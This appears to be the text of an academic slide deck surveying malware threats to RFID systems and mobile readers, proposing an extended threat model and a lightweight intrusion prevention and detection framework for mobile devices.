A Comprehensive Study for RFID Malwares on Mobile Devices TBD

Outline Motivation State-of-Art Malwares and Countermeasures for RFID and Mobile Systems – RFID Security Challenge – Mobile Security Challenge – New Challenge from RFID Malwares on Mobile Devices Extended Threat Model Basic Design of Anti-malware Framework for Mobile Devices in RFID Systems Conclusion

Motivation Severe challenge for RFID security on mobile devices, because – RFID systems are still in its infant stage. Many RFID Systems are lack of security protection. – To improve productivity, more mobile devices will be used. Mobile systems are more vulnerable than non-portable systems. Limitations for RFID malwares are being relaxed as the development of technology. – Cheaper RFID tags with larger storage capacity – hold more malicious data. – Better network connection for mobile devices – easier for malware propagation.

New Opportunities for RFID Malwares C1: The tag data size limitation (<1024 bits) make RFID malware unrealistic. EPC Gen2 Class3 Tags have at least kilo bytes storage. C2: RFID Systems are closed-loop systems. New RFID Standard: EPCglobal Architecture may require exchanging data with EPCglobal Network through the Internet. C3: More mobile devices will be used as RFID readers. RFID Malware

Lessons from Practices (1/2) L1: A small number of bits are enough to construct a RFID malware. RFID malwares can spread itself by modifying database for tag value writing. – In 2006, researchers in Vrije University proposed the first proof-of-concept malware design and basic propagation model. – Even when the space is very limited, it is still possible to store a smaller malware trigger in a RFID tag which may awake malwares that already exist in the system.

Lessons from Practices (2/2) L2: Malwares may trigger exception flow to bypass pure data level protection mechanism. System level protection is required. – In 2007, German RFID experts shows how to crash RFID Reader for RFID enabled E-Passport by modifying JPEG2000 photo image file in E- Passport. – exploit buffer overflow vulnerability in off-the- shelf libraries when loading the photo image.

Basic Threat Model & Countermeasures 1. Defend Cloning and Counterfeiting 2. Defend Malware 3. Defend Denial-of-Service Less attention for front-end devices as (mobile) RFID reader!

Malware State on Mobile Devices First proof-of-concept mobile malware was reported in But no major outbreak of mobile malwares is reported until now. In F-Secure Cell-phone Malwares Report 2007 – 373 malwares in total (including variants). – Total number of malware reaches 1 million in Symantec Internet Security Threat Report 2007 In CVE (Common Vulnerabilities and Exposures) database ( ) – 138 vulnerabilities found for software on mobile systems. – iPhone contributes 1/4 number of vulnerabilities.

Malware Trend on Mobile Devices Why are mobile malwares so unpopular? – Limited function of mobile device All existed mobile malwares requires user interaction. – Poor network connection only allow local propagations in most of time. – Low potential profit Most people only use phone or functions of mobile devices. The situation is changing. – New multi-function platform: iPhone – New network techniques: Wi-Fi, 3G – More people use it to store sensitive or private data. Businessmen and college students.

Major Malware Challenge on Mobile Devices Lack of permission control – Most mobile system are single-user systems running on simple hardware without runtime privilege control. – Social engineering are widely used in mobile malwares. Limited resources – Powered by battery – Less computation and storage capability compared to general purpose platform. – Resource-demanding security protections are prohibited. Countermeasure status – Still emerging, not mature, useful mostly for post-infection cleanup.

No-Tech Attacks in Mobile Malwares The distribution of Vulnerabilities[From CVE] The distribution of Malwares[From F-Secure] Symbian OS, the most popular mobile system with only 3 reported vulnerabilities, has the largest number of malwares.

New Challenge from RFID Malware on Mobile Devices RFID Systems: – High potential profit. – Global connection in EPCglobal architecture. Mobile Systems: – More vulnerable than non-portable counterpart. – Limited resources prohibit resource demanding security protection. RFID Systems + Mobile Systems: – Attractive targets for hackers.

Extended Threat Model RFID Tag can carry: 1.Malware trigger 2.Malware fragment 3.Malware entity RFID Tag can carry: 1.Malware trigger 2.Malware fragment 3.Malware entity Reader Firmware may be compromised Reader Firmware may be compromised Mobile Device / Middleware on it may be compromised Mobile Device / Middleware on it may be compromised Front-end Server may be compromised Enterprise Database System may be compromised EPCglobal Network may be compromised Bad News: Every node can be compromised. Good News: They are connected in a chain. Bad News: Every node can be compromised. Good News: They are connected in a chain. Public Domain Company Domain EPC Core Domain

Basic Design of Anti-malware Framework for Mobile Devices in RFID Systems To secure the frontier of RFID security chain, we arm the mobile device with Intrusion Prevention System and Intrusion Detection System. IPS IDS Dangerous Data Source Filter out anything can be filtered. Detect anything can be detected. Firewall + Check Data Format and Content. Defend DoS, SQL/Script Injection, Shell Code in text input. Another alternative: Distort Binary Data? Firewall + Check Data Format and Content. Defend DoS, SQL/Script Injection, Shell Code in text input. Another alternative: Distort Binary Data? Validate Program Behavior on Given Data Input. Defend Buffer Overflow, Unexpected Behavior. Validate Program Behavior on Given Data Input. Defend Buffer Overflow, Unexpected Behavior. IDS is well known inefficient and resource demanding. Is it feasible to use it on mobile device? IDS is well known inefficient and resource demanding. Is it feasible to use it on mobile device?

Potential Techniques (1/2) 1. Good Signature Checking – Why is IDS known inefficient and resource- demanding? Check the related signatures one by one. Complex program behaviors are inevitable in general purpose systems. Many signatures to check, no matter whether good or malicious signatures are used. – However, the functions of RFID systems are much SIMPLE than general purpose systems. Check good signatures should be affordable. To provide a more flexible system, combine good signatures with malicious signatures if necessary.

– Some Problem? How to automatically generate efficient good signatures? How to secure the good signature database and the IDS monitor on mobile device? …

Potential Techniques (2/2) 2. Cooperative mode – Connection with EPCglobal network is compulsory for new RFID Standard. Network connection is guaranteed. – To achieve longer battery time and enable sophisticated IDS protection, SHIFT part or all of intrusion detection workload to cooperative servers.

– Some Problems? What kinds of workload should be shifted to cooperative servers? What to do when the connection to cooperative servers is lost? How to efficiently balance the workload between mobile client and cooperative servers? …

Conclusion We survey state-of-art malware and countermeasures for RFID and mobile systems, and… – Propose an extended threat model to capture the malware threats to RFID systems with mobile devices – Discuss some potential techniques to defend against such malware threats.

Q & A TBD